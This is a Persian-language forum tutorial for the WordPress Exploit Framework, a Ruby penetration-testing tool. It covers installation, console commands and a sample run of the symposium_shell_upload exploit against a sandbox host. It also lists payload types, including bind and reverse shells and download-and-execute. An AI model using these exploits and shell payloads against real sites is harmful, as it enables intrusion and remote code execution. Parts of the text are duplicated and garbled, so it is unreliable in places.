WordPress Exploit Framework یک کتابخانه روبیست که به منطور توسعه و استفاده ماژولهای کمک کننده در پنتست سیستمها و فایلها مبتنی بر وردپرس استفاده میشود.
نیازمندیهای نصب:
اطمینان حاصل کنید که Ruby 2.2.x را بر روی سیستم خود نصب کردهاید؛ و بعد از نصب بودن تمامی دپندنسیهای لازمه را با باز کردن خط فرمان/ترمینال در پوشه WPXF و ران کردن دستور bundle install ،نصب کنید.
اگر bundler بر روی سیستم شما موجود نیست، میتوانید از دستور gem install bundler استفاده کنید.
قبل از ادامه دادن از نصب بودن ابزارهای ضروری برای کامپال اکستنشنهای C اطمینان حاصل کنید.
همچنین مطمئن شوید که فایلهای development header بر روی سیستم شما نصب هستند.
آموزش استفاده
محیط ترمینال/خط فرمان کامند را از دایرکتوری که فریمورک اکسپلویت وردپرس آن را دانلود کرده باز کنید و سپس دستور ruby wpxf.rb ران کنید.
پس از بارگیری،اااااا، از این نقطه به بعد شما میتوانید با دستور search به دنبال ماژول باشید و یا با دستور useآنها را بارگیری(لود) کنید. بارگیری یک ماژول روی محیط به شما اجازه ست کردن تنظیمات را با دستور set و همچنین نمایش اطلاعات ماژول ها را با دستور info میدهد.
در مثال زیر نمونهای از چگونگی بارگیری ماژول symposium_shell_upload exploit ، ماژول را ست کنید و با گزینههای اپشن بازی کنید و اکسپلویت را مقابل هدف ران کنید.
تفاوت بین auxiliary و ماژولهای اکسپلویت چیست؟
ماژول auxiliary به شما اجازه ران کردن payload را روی ماشین تارگت نمیدهد، اما در عوض امکان استخراج اطلاعات از تارگت روا فراهم میکند. تشدید میکند.
چه playloadهایی در دسترس هستند؟
نیازمندیهای نصب:
اطمینان حاصل کنید که Ruby 2.2.x را بر روی سیستم خود نصب کردهاید؛ و بعد از نصب بودن تمامی دپندنسیهای لازمه را با باز کردن خط فرمان/ترمینال در پوشه WPXF و ران کردن دستور bundle install ،نصب کنید.
اگر bundler بر روی سیستم شما موجود نیست، میتوانید از دستور gem install bundler استفاده کنید.
کد:
sudo apt-get install build-essential patch
قبل از ادامه دادن از نصب بودن ابزارهای ضروری برای کامپال اکستنشنهای C اطمینان حاصل کنید.
کد:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
همچنین مطمئن شوید که فایلهای development header بر روی سیستم شما نصب هستند.
آموزش استفاده
محیط ترمینال/خط فرمان کامند را از دایرکتوری که فریمورک اکسپلویت وردپرس آن را دانلود کرده باز کنید و سپس دستور ruby wpxf.rb ران کنید.
پس از بارگیری،اااااا، از این نقطه به بعد شما میتوانید با دستور search به دنبال ماژول باشید و یا با دستور useآنها را بارگیری(لود) کنید. بارگیری یک ماژول روی محیط به شما اجازه ست کردن تنظیمات را با دستور set و همچنین نمایش اطلاعات ماژول ها را با دستور info میدهد.
در مثال زیر نمونهای از چگونگی بارگیری ماژول symposium_shell_upload exploit ، ماژول را ست کنید و با گزینههای اپشن بازی کنید و اکسپلویت را مقابل هدف ران کنید.
کد:
[LEFT] [SIZE=14px]wpxf > use exploit/symposium_shell_upload [+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20> wpxf [exploit/symposium_shell_upload] > set host wp-sandbox [+] Set host => wp-sandbox wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ [+] Set target_uri => /wordpress/ wpxf [exploit/symposium_shell_upload] > set payload exec [+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078> wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!" [+] Set cmd => echo "Hello, world!" wpxf [exploit/symposium_shell_upload] > run [-] Preparing payload... [-] Uploading the payload... [-] Executing the payload... [+] Result: Hello, world! [+] Execution finished successfully[/SIZE][/LEFT] [SIZE=14px][/SIZE]
تفاوت بین auxiliary و ماژولهای اکسپلویت چیست؟
ماژول auxiliary به شما اجازه ران کردن payload را روی ماشین تارگت نمیدهد، اما در عوض امکان استخراج اطلاعات از تارگت روا فراهم میکند. تشدید میکند.
چه playloadهایی در دسترس هستند؟
- : یک اسکریپت آپلود میکند که پورت مشخص شده را بایند(bind) و به WPXF اجازه برقراری ریموت شل را میدهد
- : آپلود و اجرای اسکریپت PHP
- : دانلود و ران کردن ریموت فایلهای اجرایی
- : ران کردن شل بروی سرور ریموت و برگرداندن خروجی به WPXF
- : آپلود یک اسکریپت که یک شل TCP معکوس را برقرار میکند
نظر